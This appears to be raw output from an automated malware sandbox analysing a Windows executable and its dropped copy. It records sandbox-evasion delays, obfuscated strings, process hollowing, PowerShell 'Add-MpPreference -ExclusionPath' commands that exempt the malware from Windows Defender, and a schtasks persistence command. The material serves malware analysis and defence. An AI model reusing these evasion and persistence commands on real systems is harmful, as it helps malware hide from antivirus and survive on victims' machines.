                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99891
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99656
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99381
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99250
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99141
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99030
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98922
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98813
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98703
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98594
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98469
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98359
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98250
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98139
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98031
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97922
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97812
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97702
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97594
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97469
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97324
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97219
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97109
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97000
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96891
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96781
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96672
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96563
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96438
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96328
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96219
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96094
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95984
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95875
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95766
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95656
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95547
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95438
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95313
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95203
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95094
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94969
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94859
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94750
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94641
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94531
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94422
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94312
                      Source: P020241901.exe, 00000000.00000002.2018716291.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, P020241901.exe, 00000000.00000002.2002617637.00000000038E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: go06C9moK82tIqZfYyXFyHnObvr3rETjTdJKrovpuWOrJRdZAY1NhbL6xr2KDkKl0X9RNbitViXC2bICkPN7xvjou9v8j7Vr46OJCQSUieKOLS7BVe6fJxxEsYdQMjUserControlSystem.Windows.FormsBsoJdVRmu5nnFQavYBUITypeEditorSystem.Drawing.DesignSystem.DrawingvZWtiWV13yU3vV9Kh5EnumV2nvDqc7RyF0ks5tTrJObTin3CXn6UMXNCsYzcoFxPGFG5DVnMwYGRLZOicG8haQp72CnjdtMulticastDelegateWH7aWt1NlDl4G9LLBFYYHtB798QniySMMM3jDkSAcHTR8C2aoXqeq2q751oqafFxvmHuowBuyvIvDuj2O5iArGaAZKKZtlkCWLjY5O1adiwSorcrF8N30gtjjgfmGtor1EDL2bYKO2jKJdiezsOj0QLGA0LU4RrWXoiDBn8aFBLTN9MUyKfMNhIACoJgfVWl8ZPi84JFSVG6w8tDxTTva1AXJDxZW4CBlmB1X6LC85HIoPtUAkW23ojW43PIBYdwKu7ZXXPrjHPgpkJr4plIk3p1lMaVhOaokelDeCr6UGmcdOJNjxaf2Hv8uSR1LPhVp97Xo3Hjt6Pv64bOLnHfyggiGViri5EAGY8Y8kxhMon41UfUXZQosr60DTwgEvRkgLjLLSsfE0cNje9TcX0xAKQDM7LNZDFXeZkIvxW4V3GyxGyWIbYb8sMhFtXyAAW6DLme7sX2nkHVGFMOkfDOBO4V0TYJE8HF53XACrpCXanipSlFsT8289XTMyob6RQUhhW6Vl5ku9s71gq1ZDn8bwgwkvCiyphBY1Bmn1A8FYmoH9uW1uhjX5Oiqh7yN2HxwtDEnihgHyZauUHyt3XGD6icUQC0Cnq4SE2xEventArgsve7tyRHs4WHXJfRZvpApplicationExceptioncadg7Rdhg8q8Fy4m9yqTFDAaqqKDin8RPIp2jUDTrMKoAfDNbGILbvqfrOihsrVIqemUYdKbiGTtMKSJFrUfVV0vaACL65FXeurTn9E8fCEaG3IEi4ompnZTtFNQRsvIhF1ut1HeAV7lN7QKtQZKKOEqWWpeP4VpafbPNNRdxo201VexQ9abRandomIy6OlWlTI2sYZDWQ9KDgvB8pzEaIlIvY5eQSExpandableObjectConverterSystem.ComponentModelVWxAWNb5I4Q1gTqGVMCkWnSbhbbCWtgjjeSpSOIue4QBbmdGk7MRxcCKKQXEfCQbO4ejMkoi2pkL<Module>{A5B7D210-A563-43EF-9C8F-E1ED8BE4CD90}QXB9VtbDufJ2i45vqGSkde3Y8bIspnpq32sr85xLIHnQbRku0p32M98TE<PrivateImplementationDetails>{331EA7A6-2D0B-4CE5-86FC-A51130E255B7}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
                      Source: P020241901.exe, 00000000.00000002.2018716291.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, P020241901.exe, 00000000.00000002.2002617637.00000000038E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qfrOihsrVIqemUYdKb
                      Source: VKkzqGUhsZwwm.exe, 0000000E.00000002.3242832019.0000000006130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                      Source: P020241901.exe, 00000009.00000002.3231496428.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe"
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe"
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe"
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe"
Source: C:\Users\user\Desktop\P020241901.exe | Memory written: C:\Users\user\Desktop\P020241901.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Memory written: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe"
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe"
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp"
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exe
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp"
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Process created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
Source: C:\Users\user\Desktop\P020241901.exe | Queries volume information: C:\Users\user\Desktop\P020241901.exe VolumeInformation
Source: C:\Users\user\Desktop\P020241901.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\P020241901.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\P020241901.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\P020241901.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\P020241901.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Users\user\Desktop\P020241901.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
